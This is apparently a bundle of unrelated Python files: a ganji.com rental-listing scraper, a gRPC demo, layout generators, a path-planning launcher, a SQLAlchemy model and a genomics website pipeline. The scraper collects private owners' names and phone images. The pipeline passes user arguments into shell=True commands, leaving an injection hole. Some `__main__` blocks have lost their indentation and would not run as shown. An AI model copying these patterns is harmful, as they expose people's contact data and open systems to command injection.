        soup=None
        tree=None
        del tree
        del request
        del response
        del soup
    def rent(self,url):
        """Parse a ganji.com for-rent listing page and fill self.fd.

        A bare ``raise`` aborts unusable pages (blocked page, agency
        listing, no contact image, unknown city); caller catches it.
        """
        # self.fd['house_city'] = urlparse(url)[1].replace('.ganji.com',"")
        # Derive the city code from the sub-domain, optionally mapped
        # through the citynameDict_sf translation table.
        hc= urlparse(url)[1].replace('.ganji.com',"")
        hc2=citynameDict_sf.get(hc)
        if hc2:
            self.fd['house_city']=hc2
        else:
            self.fd['house_city']=hc
        request = urllib2.Request(url, None, self.header)
        response = urllib2.urlopen(request).read()
        # mayGetIt() returning True means the site served a block page.
        if self.mayGetIt(response):
            self.fd={}
            raise
        tree = etree.HTML(response)
        if re.search("<span class=\"city\"><a .*?>(.*?)</a>", response):
            cityname=re.search("<span class=\"city\"><a .*?>(.*?)</a>", response).group(1)
            self.fd['cityname'] = cityname
        else:
            raise
        self.fd['house_flag'] = 2
        self.fd['house_type'] = 6
        self.fd['house_floor'] = 0
        self.fd['house_topfloor'] = 0
        soup =BeautifulSoup(response)
        detail_mer = soup.find('div',{'class':'detail_mer'})
        # Not an individual listing (posted by an agency) -> abort
        if u"个人房源" not in str(detail_mer):raise
        Dname = detail_mer.find('span',{'class':'Dname'})
        if Dname:
            self.fd['owner_name'] = str(Dname.string)
        else:
            self.fd['owner_name'] = ""
        # The phone number is only available as an image.
        ganji_phone_call_class = detail_mer.find('span',{'class':'ganji_phone_call_class'})
        if ganji_phone_call_class:
            self.fd['owner_phone_pic'] = ganji_phone_call_class.contents[0]
            if str(ganji_phone_call_class).find('src='):
                self.fd['owner_phone_pic'] = 'http://'+urlparse(url)[1]+ganji_phone_call_class.img['src']
            else:
                self.fd['owner_phone_pic'] = None
        else:
            self.fd['owner_phone_pic'] = None
        # No contact information -> abort
        if not self.fd['owner_phone_pic']:raise
        # NOTE(review): unlike buy()/require(), this method stores
        # house_area/room/hall/toilet/veranda as raw strings (no int())
        # and uses None instead of 0/"" fallbacks — confirm whether the
        # downstream consumer relies on that before unifying.
        if re.search(self.house_totalarea_regex, response):
            house_totalarea=re.search(self.house_totalarea_regex, response).group(1)
            self.fd['house_area'] = house_totalarea
        else:
            self.fd['house_area'] = None
        if re.search(self.house_price_regex_2, response):
            house_price=re.search(self.house_price_regex_2, response).group(1)
            if house_price=="面议":
                house_price=0
            self.fd['house_price'] = int(house_price)
        else:
            self.fd['house_price'] = 0
#        house_price=tree.xpath("/html/body/div[2]/div/div/ul/li/span") and tree.xpath("/html/body/div[2]/div/div/ul/li/span")[0].text.strip() or None
#        v['house_price'] = house_price
        # Publication time; page shows month-day only, year/clock from now.
        posttime=CSSSelector('span.pub_time')(tree)!=None and CSSSelector('span.pub_time')(tree)[0].text.strip() or None
        if posttime:
            Y=int(time.strftime('%Y', time.localtime()))
            M=int(posttime.split(' ')[0].split('-')[0])
            D=int(posttime.split(' ')[0].split('-')[1])
            H=int(time.strftime('%H',time.localtime(time.time())))
            Min=int(time.strftime('%M',time.localtime(time.time())))
            s = datetime.datetime(Y,M,D,H,Min)
            posttime=str(int(time.mktime(s.timetuple())))
            self.fd['house_posttime'] =posttime
        else:
            s=time.localtime(time.time())
            self.fd['house_posttime'] =str(int(time.mktime(s)))
        house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
        self.fd['house_title'] = house_title.replace("(求购)","").replace("(求租)","").replace("(出售)","")
        if re.search(self.house_room_regex, response):
            house_room=re.search(self.house_room_regex, response).group(1)
            self.fd['house_room'] = house_room
        else:
            self.fd['house_room'] = 0
        if re.search(self.house_hall_regex, response):
            house_hall=re.search(self.house_hall_regex, response).group(1)
            self.fd['house_hall'] = house_hall
        else:
            self.fd['house_hall'] = 0
        if re.search(self.house_toilet_regex, response):
            house_toilet=re.search(self.house_toilet_regex, response).group(1)
            self.fd['house_toilet'] = house_toilet
        else:
            self.fd['house_toilet'] = 0
        if re.search(self.house_veranda_regex, response):
            house_veranda=re.search(self.house_veranda_regex, response).group(1)
            self.fd['house_veranda'] = house_veranda
        else:
            self.fd['house_veranda'] = 0
        # Floor of the flat (group 1) and total floors (group 2)
        if re.search(self.house_floor_regex, response):
            house_floor=re.search(self.house_floor_regex, response).group(1)
            house_topfloor=re.search(self.house_floor_regex, response).group(2)
            self.fd['house_floor'] = int(house_floor)
            self.fd['house_topfloor'] = int(house_topfloor)
        else:
            self.fd['house_floor'] = 0
            self.fd['house_topfloor'] = 0
        # NOTE(review): house_title is recomputed here, duplicating the
        # assignment above with identical results.
        house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
        self.fd['house_title'] = house_title.replace("(求购)","").replace("(求租)","").replace("(出售)","")
        # Description text (tags and the site watermark sentence stripped)
        detail_box = soup.find('div',{'class':'detail_box'})
        if detail_box:
            house_desc = str(detail_box('p')[1])
            self.fd['house_desc'] = re.sub("<.*?>|\n|\r|\t|联系我时请说明是从赶集网上看到的","",house_desc)
        else:
            self.fd['house_desc'] = None
        d_i = soup.find('ul',{'class':'d_i'})
        # Neighborhood (residential complex) name.
        # Try the JS-embedded variant first, then the HTML markup.
        if re.search(self.xiaoqu_regex, response):
            borough_name=re.search(self.xiaoqu_regex, response).group(1)
            self.fd['borough_name'] = borough_name
            if re.search(self.address_regex, response):
                house_addr=re.search(self.address_regex, response).group(1)
                self.fd['house_addr'] = house_addr
        else:
            if d_i.find(text="小区: "):
                borough_box = d_i.find(text="小区: ").parent
                borough_name = borough_box.find("a")
                if borough_name:
                    self.fd['borough_name'] = borough_name.string
                else:
                    self.fd['borough_name'] = None
                # Street address: the text node following the complex link
                if borough_name and borough_name.nextSibling:
                    house_addr = borough_name.nextSibling.string
                    self.fd['house_addr'] = re.sub("\(|\)| ","",house_addr)
                else:
                    self.fd['house_addr'] = None
            else:
                if re.search(self.borough_name_regex, response):
                    borough_name=re.search(self.borough_name_regex, response).group(1)
                    self.fd['borough_name'] = re.sub("\(.*\)| ","",borough_name)
        # District / section of the city
        area_box = d_i.find(text="区域: ").parent
        area_a = area_box('a')
        if area_a and len(area_a)>1:
            self.fd['house_region'] = str(area_a[0].string)
            self.fd['house_section'] = str(area_a[1].string)
        elif area_a and len(area_a)==1:
            self.fd['house_region'] = str(area_a[0].string)
            self.fd['house_section'] = ""
        else:
            self.fd['house_region'] = ""
            self.fd['house_section'] = ""
        # Building age: page carries the construction year
        if re.search(self.house_age_regex, response):
            house_age=re.search(self.house_age_regex, response).group(1)
            Y=int(time.strftime('%Y', time.localtime()))
            house_age=Y-int(house_age)
            self.fd['house_age'] = house_age
        else:
            self.fd['house_age'] = 0
        # Orientation (facing direction), mapped via helper toward()
        if re.search(self.house_toward_regex, response):
            house_toward=re.search(self.house_toward_regex, response).group(1)
            self.fd['house_toward'] = toward(house_toward)
        else:
            self.fd['house_toward'] = 0
        if re.search(self.house_fitment_regex, response):
            house_fitment=re.search(self.house_fitment_regex, response).group(1)
            self.fd['house_fitment'] = fitment(house_fitment)
        else:
            self.fd['house_fitment'] = 2
        # Deposit/payment scheme, mapped via helper deposit()
        if re.search(self.house_deposit_regex, response):
            house_deposit=re.search(self.house_deposit_regex, response).group(1)
            self.fd['house_deposit'] = deposit(house_deposit)
        else:
            self.fd['house_deposit'] = None
        # Drop references so the large parse trees can be collected.
        request = None
        response = None
        soup=None
        tree=None
        del tree
        del request
        del response
        del soup
    def require(self,url):
        """Parse a ganji.com wanted-to-rent listing page and fill self.fd.

        A bare ``raise`` aborts unusable pages (blocked page, agency
        listing, no contact image, unknown city); caller catches it.
        """
        # Derive the city code from the sub-domain, optionally mapped
        # through the citynameDict_sf translation table.
        hc= urlparse(url)[1].replace('.ganji.com',"")
        hc2=citynameDict_sf.get(hc)
        if hc2:
            self.fd['house_city']=hc2
        else:
            self.fd['house_city']=hc
        request = urllib2.Request(url, None, self.header)
        response = urllib2.urlopen(request).read()
        # mayGetIt() returning True means the site served a block page.
        if self.mayGetIt(response):
            self.fd={}
            raise
        tree = etree.HTML(response)
        if re.search("<span class=\"city\"><a .*?>(.*?)</a>", response):
            cityname=re.search("<span class=\"city\"><a .*?>(.*?)</a>", response).group(1)
            self.fd['cityname'] = cityname
        else:
            raise
        # Fields without meaning for a wanted-to-rent post get defaults.
        self.fd['house_flag'] = 4
        self.fd['house_type'] = 6
        self.fd['house_floor'] = 0
        self.fd['house_topfloor'] = 0
        self.fd['house_area']=0
        self.fd['house_age'] = 0
        self.fd['house_toward'] = 0
        self.fd['house_fitment'] = 0
        self.fd['house_deposit'] = 0
#        self.fd['house_totalarea_max'] = 0
#        self.fd['house_totalarea_min'] = 0
        soup =BeautifulSoup(response)
        detail_mer = soup.find('div',{'class':'detail_mer'})
        # Not an individual listing (posted by an agency) -> abort
        if u"个人房源" not in str(detail_mer):raise
        Dname = detail_mer.find('span',{'class':'Dname'})
        if Dname:
            self.fd['owner_name'] = Dname.string
        else:
            self.fd['owner_name'] = None
        # The phone number is only available as an image.
        ganji_phone_call_class = detail_mer.find('span',{'class':'ganji_phone_call_class'})
        if ganji_phone_call_class:
            self.fd['owner_phone_pic'] = ganji_phone_call_class.contents[0]
            if str(ganji_phone_call_class).find('src='):
                self.fd['owner_phone_pic'] = 'http://'+urlparse(url)[1]+ganji_phone_call_class.img['src']
            else:
                self.fd['owner_phone_pic'] = None
        else:
            self.fd['owner_phone_pic'] = None
        # No contact information -> abort
        if not self.fd['owner_phone_pic']:raise
        # Budget may be "N以上" (at least N), "N以下" (at most N) or a
        # "lo-hi" range, expressed in 元/月 (CNY per month).
        if re.search(self.house_price_regex_zu, response):
            house_price_zu = re.search(self.house_price_regex_zu, response).group(1)
            house_price_zu = house_price_zu.replace('元/月','')
            if house_price_zu.find("以上") != -1:
                self.fd['house_price_max'] = 0
                self.fd['house_price'] = int(house_price_zu.replace('以上',''))
            elif house_price_zu.find("以下") != -1:
                self.fd['house_price_max'] = int(house_price_zu.replace('以下',''))
                self.fd['house_price'] = 0
            elif house_price_zu.find("-") != -1:
                self.fd['house_price_max'] = int(house_price_zu.split('-')[1])
                self.fd['house_price'] = int(house_price_zu.split('-')[0])
            else:
                self.fd['house_price_max'] = 0
                self.fd['house_price'] = 0
        else:
            self.fd['house_price_max'] = 0
            self.fd['house_price'] = 0
        # Publication time; page shows month-day only, year/clock from now.
        posttime=CSSSelector('span.pub_time')(tree)!=None and CSSSelector('span.pub_time')(tree)[0].text.strip() or None
        if posttime:
            Y=int(time.strftime('%Y', time.localtime()))
            M=int(posttime.split(' ')[0].split('-')[0])
            D=int(posttime.split(' ')[0].split('-')[1])
            H=int(time.strftime('%H',time.localtime(time.time())))
            Min=int(time.strftime('%M',time.localtime(time.time())))
            s = datetime.datetime(Y,M,D,H,Min)
            posttime=str(int(time.mktime(s.timetuple())))
            self.fd['house_posttime'] =posttime
        else:
            s=time.localtime(time.time())
            self.fd['house_posttime'] =str(int(time.mktime(s)))
        house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
        self.fd['house_title'] = house_title.replace("(求购)","").replace("(求租)","").replace("(出售)","")
        if re.search(self.house_room_regex, response):
            house_room=re.search(self.house_room_regex, response).group(1)
            self.fd['house_room'] = int(house_room)
        else:
            self.fd['house_room'] = 0
        if re.search(self.house_hall_regex, response):
            house_hall=re.search(self.house_hall_regex, response).group(1)
            self.fd['house_hall'] = int(house_hall)
        else:
            self.fd['house_hall'] = 0
        if re.search(self.house_toilet_regex, response):
            house_toilet=re.search(self.house_toilet_regex, response).group(1)
            self.fd['house_toilet'] = int(house_toilet)
        else:
            self.fd['house_toilet'] = 0
        if re.search(self.house_veranda_regex, response):
            house_veranda=re.search(self.house_veranda_regex, response).group(1)
            self.fd['house_veranda'] = int(house_veranda)
        else:
            self.fd['house_veranda'] = 0
        # NOTE(review): house_title is recomputed here, duplicating the
        # assignment above with identical results.
        house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
        self.fd['house_title'] = house_title.replace("(求购)","").replace("(求租)","").replace("(出售)","")
        # Description text (tags and the site watermark sentence stripped)
        detail_box = soup.find('div',{'class':'detail_box'})
        if detail_box:
            house_desc = str(detail_box('p')[1])
            self.fd['house_desc'] = re.sub("<.*?>|\n|\r|\t|联系我时请说明是从赶集网上看到的","",house_desc)
        else:
            self.fd['house_desc'] = ""
        d_i = soup.find('ul',{'class':'d_i'})
        # Neighborhood (residential complex) name.
        # Try the JS-embedded variant first, then the regex fallback.
        if re.search(self.xiaoqu_regex, response):
            borough_name=re.search(self.xiaoqu_regex, response).group(1)
            self.fd['borough_name'] = borough_name
            if re.search(self.address_regex, response):
                house_addr=re.search(self.address_regex, response).group(1)
                self.fd['house_addr'] = house_addr
        else:
            if re.search(self.borough_name_regex_reg, response):
                borough_name=re.search(self.borough_name_regex_reg, response).group(1)
                self.fd['borough_name'] = borough_name
            if re.search(self.house_addr_regex_reg, response):
                house_addr=re.search(self.house_addr_regex_reg, response).group(1)
                self.fd['house_addr'] = house_addr
            else:
                self.fd['house_addr'] = ''
        # District / section of the city
        area_box = d_i.find(text="区域: ").parent
        area_a = area_box('a')
        if area_a and len(area_a)>1:
            self.fd['house_region'] = str(area_a[0].string)
            self.fd['house_section'] = str(area_a[1].string)
        elif area_a and len(area_a)==1:
            self.fd['house_region'] = str(area_a[0].string)
            self.fd['house_section'] = ""
        else:
            self.fd['house_region'] = ""
            self.fd['house_section'] = ""
        # Drop references so the large parse trees can be collected.
        request = None
        response = None
        soup=None
        tree=None
        del tree
        del request
        del response
        del soup
    def extractDict(self):
        """Dispatch to the parser matching self.kind ("1" sell, "2" rent,
        "3" buy, otherwise require), mark the URL as crawled, and return
        the populated field dict.

        In dev mode (isDEV) the fields are printed and nothing is
        returned; otherwise missing fields are filled from
        getDefaultVal() and self.fd is returned.
        """
        if checkPath(homepath,self.folder,self.urls):
            pass
        else:
            try:
                if self.kind=="1":
                    self.sell(self.urls)
                elif self.kind=="2":
                    self.rent(self.urls)
                elif self.kind=="3":
                    self.buy(self.urls)
                else:
                    self.require(self.urls)
                # Remember this URL so it is not crawled again.
                makePath(homepath,self.folder,self.urls)
                # Older than seven days
                # if (time.time() -self.fd["posttime"]) > 7*24*36000:return
            except Exception,e:
                # Parsers abort with bare raise; record the failure.
                self.fd['house_title']=None
                msglogger.info("%s 链接采集异常"%self.urls)
                # print "%s||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||"%self.urls
            if isDEV:
                # self.fd.update(getDefaultVal(4))
                dfv=getDefaultVal(self.kind)
                for item in dfv.items() :
                    # print item[0],item[1]
                    if item[0] not in self.fd:
                        self.fd[item[0]]=dfv.get(item[0])
                for item in dfv.items() :
                    print item[0],self.fd[item[0]],type(self.fd[item[0]])
                return
            else:
                dfv=getDefaultVal(self.kind)
                for item in dfv.items() :
                    # print item[0],item[1]
                    if item[0] not in self.fd:
                        self.fd[item[0]]=dfv.get(item[0])
                self.fd["is_checked"] = 1
                self.fd["web_flag"] = "gj"
                #print "%s %s %s %s %s"%(("%s.soufun.com"% self.citycode),self.citycode, self.kind ,time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(time.time())), self.urls)
                return self.fd
        # NOTE(review): both branches above return, so the code below only
        # runs when checkPath() was True (URL already crawled) — and then
        # self.fd may not contain "is_checked".  Confirm whether this debug
        # dump is still needed.
        if not self.fd["is_checked"]:
            for i in self.fd.items():
                print i[0],i[1]
            print "*"*80
        # if len(self.fd)==7 or len(self.fd)==17:
            # print "#####################################"
            # continue
        # req=urllib2.Request("http://site.jjr360.com/app.php", urllib.urlencode(self.fd))
        # p=self.br.open(req).read().strip()
        # print p.decode('gbk')
        # print "*"*80
class fetchData(threading.Thread):
    """Worker thread: collect listing links for one city/kind and crawl them."""
    def __init__(self,d):
        threading.Thread.__init__(self)
        # d holds at least "citycode" and "kind"
        self.d=d
    def run(self):
        link_crawler = LinkCrawl(self.d["citycode"], self.d["kind"])
        collected_links = link_crawler.runme()
        content_crawler = ContentCrawl(collected_links, self.d["citycode"], self.d["kind"])
        content_crawler.extractDict()
class getLinksThread(threading.Thread):
    """Worker thread: run one link-collection pass for a city/kind pair."""
    def __init__(self,d):
        threading.Thread.__init__(self)
        # d holds at least "citycode" and "kind"
        self.d=d
    def run(self):
        gc.enable()
        crawler = LinkCrawl(self.d["citycode"], self.d["kind"])
        crawler.runme()
        # Clear objects the collector could not free.
        del gc.garbage[:]
def getLinks(d):
    """Endlessly re-run link collection, sleeping d["st2"] seconds between passes."""
    crawler = LinkCrawl(d["citycode"], d["kind"], d["st1"])
    while True:
        crawler.runme()
        # Clear objects the collector could not free before sleeping.
        del gc.garbage[:]
        time.sleep(int(d["st2"]))
def getContent(clinks,citycode,kind,upc):
    """Crawl one batch of detail links, post the parsed fields upstream,
    and log the outcome (best effort: posting errors are logged, not raised)."""
    crawler = ContentCrawl(clinks, citycode, kind, upc)
    fields = crawler.extractDict()
    outcome = ""
    try:
        outcome = postHost(fields)
    except Exception as e:
        outcome = e
    print(outcome)
    msglogger.info("%s|%s|%s" % (clinks, outcome, fields))
    # Clear objects the collector could not free.
    del gc.garbage[:]
if __name__=="__main__":
# lc=LinkCrawl(citycode="su",kind="1")
# lc.runme()#
#url1 = "http://su.ganji.com/fang5/11071015_233901.htm"
#url2 = "http://su.ganji.com/fang1/11071017_418972.htm"
#url3 = "http://su.ganji.com/fang4/11062413_4152.htm"
#url4 = "http://su.ganji.com/fang2/11070900_21214.htm"
# cc=ContentCrawl("http://su.ganji.com/fang2/11071417_21820.htm",citycode="su",kind="4",upc=0)
cc=ContentCrawl("http://su.ganji.com/fang5/tuiguang-4269169.htm",citycode="su",kind="1",upc=0)
cc.extractDict()
# while 1:
# for i in range(1,5):
# k = "%s" % str(i)
# try:
# lc=LinkCrawl(citycode="su",kind=k)
# clinks=lc.runme()
# cc=ContentCrawl(clinks,citycode="su",kind=k)
# cc.extractDict()
# except:
# pass
|
from typing import Dict, Iterator, Union
from grpc import RpcContext
from optionalgrpc.service import Service
from my_foo_project.client import foo_pb2_grpc, foo_pb2
@Service(rpc_servicer = foo_pb2_grpc.add_FooServicer_to_server,
         stub = foo_pb2_grpc.FooStub,
         port = 1000)
class Foo(foo_pb2_grpc.FooServicer):
    """Demo servicer exercising unary, client-streaming and bidirectional RPCs."""

    def __init__(self, configs: Dict[str, Union[int, str]], server: bool = False, use_rpc: bool = False):
        self.configs = configs
        self.server = server
        self.use_rpc = use_rpc

    def sendUnary(self, request: foo_pb2.MyMessage, context: RpcContext = None) -> foo_pb2.MyMessage:
        """Reply with a one-message summary of the received message."""
        reply = "Received message. It had number: {0}. It had {1} characters.".format(
            request.num, len(request.contents))
        return foo_pb2.MyMessage(num = 1, contents = reply)

    def sendStream(self, request_iterator: Iterator[foo_pb2.MyMessage], context: RpcContext = None) -> foo_pb2.MyMessage:
        """Consume the whole client stream and reply with aggregate statistics."""
        count = 0
        num_total = 0
        char_total = 0
        for message in request_iterator:
            count += 1
            num_total += message.num
            char_total += len(message.contents)
        reply = "Received: {0} messages. They add up to: {1}. They had {2} characters.".format(
            count, num_total, char_total)
        return foo_pb2.MyMessage(num = count, contents = reply)

    def sendBiStream(self, request_iterator: Iterator[foo_pb2.MyMessage], context: RpcContext = None) -> Iterator[foo_pb2.MyMessage]:
        """Echo each incoming message back on the response stream."""
        for message in request_iterator:
            yield foo_pb2.MyMessage(num = message.num, contents = "Received: {0}".format(message.contents))
|
import os.path
import shutil
from collections import OrderedDict
from .base import Generator, run_process
from ..base import get_logger
import json
logger = get_logger(__file__)
class JSONGenerator(Generator):
    """Dump every layout of the project into one ``<project>.json`` file."""
    def generate(self, base="."):
        target_dir = os.path.abspath(base)
        os.makedirs(target_dir, exist_ok=True)
        out_file = os.path.join(target_dir, "%s.json" % self._project.internal_name)
        # Keyed by internal layout name; insertion order preserved.
        trees = OrderedDict(
            (layout.internal_name, layout._tree)
            for layout in self._project.layouts.values()
        )
        with open(out_file, "w") as fp:
            json.dump({"layouts": trees}, fp, indent=2, ensure_ascii=False)
class QRGenerator(Generator):
    """Render the project's first layout as a QR-code PNG using the external
    ``qrencode`` binary."""
    def generate(self, base="."):
        # Bail out early when the required external tool is missing.
        if not shutil.which("qrencode"):
            logger.error("`qrencode` not found on PATH.")
            return
        # Only the first layout is encoded (dict iteration order decides).
        for name, layout in self._project.layouts.items():
            logger.info("Choosing first layout from project: %s" % name)
            tree = layout._tree
            break
        payload = {
            "name": layout.native_display_name,
            "space": tree["strings"]["space"],
            "enter": tree["strings"]["return"],
            "normal": tree["modes"]["mobile-default"],
            "shifted": tree["modes"]["mobile-shift"],
            "longPress": tree["longpress"]
        }
        encoded = json.dumps(payload, ensure_ascii=False, separators=(',', ':'))
        logger.debug(encoded)
        png_path = os.path.abspath(os.path.join(base, "%s.png" % name))
        run_process(["qrencode", encoded, "-o", png_path], shell=False)
        logger.info("QR code generated at: %s" % png_path)
import argparse
import os
from src.h_CPP.Environment import H_CPPEnvironmentParams, H_CPPEnvironment
from src.CPP.Environment import CPPEnvironment, CPPEnvironmentParams
from src.DH.Environment import DHEnvironmentParams, DHEnvironment
from src.DHMulti.Environment import DHMultiEnvironment
from utils import *
def main_cpp(p):
    """Run the (flat) Coverage Path Planning environment with params *p*."""
    CPPEnvironment(p).run()
def main_dh(p):
    """Run the Data Harvesting environment with params *p*."""
    DHEnvironment(p).run()
def main_h(p):
    """Run Coverage Path Planning with the hierarchical agent, params *p*."""
    H_CPPEnvironment(p).run()
def main_dh_multi(p):
    """Run the multi-agent Data Harvesting environment with params *p*."""
    DHMultiEnvironment(p).run()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', action='store_true', help='Activates usage of GPU')
parser.add_argument('--generate_config', action='store_true', help='Enable to write default config only')
parser.add_argument('--config', default=None, help='Path to config file')
parser.add_argument('--id', default=None, help='If set overrides the logfile name and the save name')
parser.add_argument('--params', nargs='*', default=None)
parser.add_argument('--h_cpp', action='store_true', help='Run Coverage Path Planning with hierarchical Agent')
parser.add_argument('--cpp', action='store_true', help='Run Coverage Path Planning')
parser.add_argument('--dh', action='store_true', help='Run Path Planning for Data Harvesting')
parser.add_argument('--multi', action='store_true', help='Run Path Planning for Multi (So far only DH)')
args = parser.parse_args()
if args.generate_config:
if args.h_cpp:
generate_config(H_CPPEnvironmentParams(), "config/old_configs/h_cpp.json")
elif args.dh:
generate_config(DHEnvironmentParams(), "config/old_configs/dh.json")
elif args.cpp:
generate_config(CPPEnvironmentParams(), "config/old_configs/cpp.json")
else:
print("Specify which config to generate, DH or CPP")
exit(0)
if args.config is None:
print("Config file needed!")
exit(1)
if not args.gpu:
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
params = read_config(args.config)
if args.params is not None:
params = override_params(params, args.params)
if args.id is not None:
params.model_stats_params.save_model = "models/" + args.id
params.model_stats_params.log_file_name = args.id
save_json_to_logs(params, params.model_stats_params.save_model + f'{params.model_stats_params.log_file_name}/')
save_json_to_logs(params, 'logs/plots/' + str(params.model_stats_params.log_file_name) + '/')
# if args.cpp:
# main_cpp(params)
# elif args.h_cpp:
# main_h(params)
# elif args.dh:
# if args.multi:
# main_dh_multi(params)
# else:
# main_dh(params)
main_h(params) |
class BarryFileException(Exception):
    """Raised for problems with input files."""
class BarryConversionException(Exception):
    """Raised when converting a file to a dataframe fails."""
class BarryExportException(Exception):
    """Raised when writing a dataframe out to a file fails."""
class BarryDFException(Exception):
    """Raised when a dataframe transformation fails."""
|
# Convert a JSON-like array literal of single-quoted strings into a
# Python list.  Takes the literal as a string and returns the list of
# the extracted string values.
def toStringArray(jsonArray):
    """Extract the single-quoted string values from *jsonArray*.

    Only characters between matching ``'`` quotes are collected, so any
    whitespace and punctuation outside the quotes is ignored naturally.
    (The previous implementation stripped ALL spaces up front, which
    corrupted values containing spaces, e.g. 'New York' -> 'NewYork'.)
    """
    stringArray = []
    # Are we currently inside a quoted string?
    stringOpen = False
    word = ""
    # Walk the input character by character.
    for c in jsonArray:
        if c == "'":
            if stringOpen:
                # Closing quote: the collected word is complete.
                stringArray.append(word)
                word = ""
                stringOpen = False
            else:
                # Opening quote: start collecting.
                stringOpen = True
        elif stringOpen:
            # Inside a string: keep the character (including spaces).
            word += c
    return stringArray
# Entry point of the demo program: exercise the string-extraction
# function above on a sample input and print each extracted element.
demo_input = "[ 'Null', 'Eins', 'Zwei', 'Drei', 'Vier' ]"
for element in toStringArray(demo_input):
    print(element)
|
from .MidiInfo import * |
from __future__ import annotations
from datetime import datetime
from typing import TYPE_CHECKING
from sqlalchemy import Boolean, Column, DateTime, Integer, String, Text
from grouper.constants import MAX_NAME_LENGTH
from grouper.models.base.model_base import Model
if TYPE_CHECKING:
from grouper.models.base.session import Session
class Permission(Model):
    """Represents permission types.

    See PermissionEdge for the mapping of which permissions exist on a given Group.
    """

    __tablename__ = "permissions"

    id = Column(Integer, primary_key=True)
    # Permission name; unique across the table and capped at the global
    # grouper name-length limit.
    name = Column(String(length=MAX_NAME_LENGTH), unique=True, nullable=False)
    description = Column(Text, nullable=False)
    created_on = Column(DateTime, default=datetime.utcnow, nullable=False)
    # Whether grants of this permission are subject to auditing.
    audited = Column(Boolean, default=False, nullable=False)
    enabled = Column(Boolean, default=True, nullable=False)

    @staticmethod
    def get(session: Session, name: str) -> Permission:
        """Return the permission with *name*, or None when it does not exist
        (Query.scalar() yields None for an empty result)."""
        return session.query(Permission).filter_by(name=name).scalar()
|
from setuptools import setup, find_packages
setup(
name="tg_logger",
version="3.1",
description="A tool to bridge python logging and user files to telegram bot",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
author="ChernV (otter18)",
author_email="vchern185@gmail.com",
url="https://github.com/otter18/tg_logger",
packages=find_packages(),
install_requires=[
"pyTelegramBotAPI==3.7.6",
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
|
import argparse
from update_js import update_js
from generate_display_tables import generate_display_tables
from datetime import date, timedelta
import subprocess
def read_lexicon(lfile):
    """Read a lexicon file (one region per line, comma-separated aliases)
    and return a dict mapping every alias — plus its all-uppercase form —
    to the first (canonical) name on its line."""
    mapping = {}
    with open(lfile) as handle:
        for line in handle:
            names = line.strip().split(",")
            canonical = names[0]
            for name in names:
                mapping[name] = canonical
                # Also register the uppercase spelling when it differs.
                upper = name.upper()
                if upper != name:
                    mapping[upper] = canonical
    return mapping
def parse_setup():
    """Declare and parse the command-line interface for the update pipeline."""
    cli = argparse.ArgumentParser()
    cli.add_argument("-i", "--input", help="Path to the protobuf file to update the website to display.")
    cli.add_argument("-s", "--sample_regions", help="Path to a two-column tsv containing sample names and associated regions.")
    cli.add_argument("-j", "--geojson", help="Path to a geojson to use.")
    cli.add_argument("-m", "--metadata", help="Path to a metadata file matching the targeted protobuf to update the website to display.")
    cli.add_argument("-f", "--reference", help="Path to a reference fasta.")
    cli.add_argument("-a", "--annotation", help="Path to a gtf annotation matching the reference.")
    cli.add_argument("-t", "--threads", type=int, help="Number of threads to use.", default=4)
    cli.add_argument("-l", "--lexicon", help="Optionally, link to a text file containing all names for the same region, one region per row, tab separated.", default="")
    cli.add_argument("-X", "--lookahead", type=int, help="Number to pass to parameter -X of introduce. Increase to merge nested clusters. Default 2", default=2)
    cli.add_argument("-H", "--host", help="Web-accessible link to the current directory for taxodium cluster view.", default="https://raw.githubusercontent.com/jmcbroome/introduction-website/main/")
    return cli.parse_args()
def primary_pipeline(args):
    """Run the full website-update pipeline.

    Steps: run `matUtils introduce` to compute clusters, regenerate the map
    display JS, build the top-cluster tables, rewrite the metadata file with
    added cluster/region columns, and emit a taxodium-viewable protobuf.

    Side effects: writes hardcoded_clusters.tsv, clusterswapped.tsv and
    cview.pb in the working directory; shells out to `matUtils`.
    """
    pbf = args.input  # NOTE(review): unused; args.input is referenced directly below
    mf = args.metadata
    # Optional region-name normalization table (alternative -> canonical).
    if args.lexicon != "":
        conversion = read_lexicon(args.lexicon)
    else:
        conversion = {}
    # print(conversion)
    print("Calling introduce.")
    subprocess.check_call("matUtils introduce -i " + args.input + " -s " + args.sample_regions + " -u hardcoded_clusters.tsv -T " + str(args.threads) + " -X " + str(args.lookahead), shell=True)
    print("Updating map display data.")
    update_js(args.geojson, conversion)
    print("Generating top cluster tables.")
    generate_display_tables(conversion, host = args.host)
    print("Preparing taxodium view.")
    # sd maps each sample name to "<column9>_<cluster_id>" parsed from the
    # introduce output; column 9 is presumably the region name and the last
    # column a comma-delimited sample list — TODO confirm against the
    # matUtils introduce output format.
    sd = {}
    # with open("cluster_labels.tsv") as inf:
    #     for entry in inf:
    #         spent = entry.strip().split()
    #         if spent[0] == "sample":
    #             continue
    #         sd[spent[0]] = spent[1]
    with open("hardcoded_clusters.tsv") as inf:
        for entry in inf:
            spent = entry.strip().split()
            # Skip the header row.
            if spent[0] == 'cluster_id':
                continue
            for s in spent[-1].split(","):
                sd[s] = spent[9] + "_" + spent[0]
    # rd maps sample name -> region from the user-supplied two-column tsv.
    rd = {}
    with open(args.sample_regions) as inf:
        for entry in inf:
            spent = entry.strip().split()
            rd[spent[0]] = spent[1]
    with open(mf) as inf:
        with open("clusterswapped.tsv","w+") as outf:
            #clusterswapped is the same as the metadata input
            #except with the country column updated.
            i = 0
            for entry in inf:
                spent = entry.strip().split("\t")
                if i == 0:
                    # Header row: append the two new column names.
                    spent.append("cluster")
                    spent.append("region")
                    i += 1
                    print("\t".join(spent),file=outf)
                    continue
